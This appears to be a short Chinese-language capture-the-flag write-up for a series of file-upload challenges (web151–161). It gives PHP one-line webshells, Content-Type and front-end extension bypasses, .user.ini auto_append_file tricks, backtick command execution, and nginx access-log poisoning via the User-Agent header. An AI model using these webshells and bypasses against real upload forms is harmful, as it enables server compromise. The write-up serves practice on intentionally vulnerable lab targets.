web151
打算用bp改文件形式(可能没操作好)我重新试了一下抓不到
文件上传不成功
改网页前端
鼠标右键(检查),把png改为php
访问,执行命令
我上传的马是<?php eval($_POST[a]);?>
查看
web152
上传马
把Content-Type改为 image/png就可以了
然后查看
web153
直接上传马发现nothing here
查一下,原来要使用
利用上传user.ini进行文件上传绕过
filename 改为.user.ini
然后把上传的文件改为
auto_append_file=xxx
xxx就是我们上传的文件
这里是auto_append_file=/var/www/html/upload/m.png
然后访问看看传上去没有
然后查看flag就行
web154
对php进行了过滤,写一个新马
<?= eval($_POST[a]);?>
电脑自动杀的在bp里面改
web155
php被过滤在bp中改马发包
一种新的方式
auto_append_file="xxx"
xxx是你传的文件名
这里就是
auto_append_file="m.png"
上传成功
查看flag
web156
在上题基础上过滤了[]用{}换掉
改马为<?= eval($_POST{a});?>
然后一样的操作上传成功(不会的私信)
查看flag
web157
把很多符号过滤了直接摊牌我要看flag
就是把a换成具体的命令
<?=system('tac ../f*')?>
web158
他后面肯定还会过滤东西我们直接搞个升级版
反引号会自动解析句子
<?=`tac ../f*`?>
一样的操作.user.ini
然后访问upload
web159
与上道题一样
web160
这道题反引号也过滤了
那么我们就得用日志文件包含
过滤了log所以用双引号绕过
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
.user.ini
打开日志文件了
改user-agent
web 161
上传没有回显加了图片头才行
GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
GIF89a
auto_append_file="m.png"
user-agent:传马
<?php eval($_POST[a]);?>
我本来是想用POST的方法获得flag的但是不知道为什么突然用不了了
然后用的antsword
重新开了靶机发现也可以哈哈哈
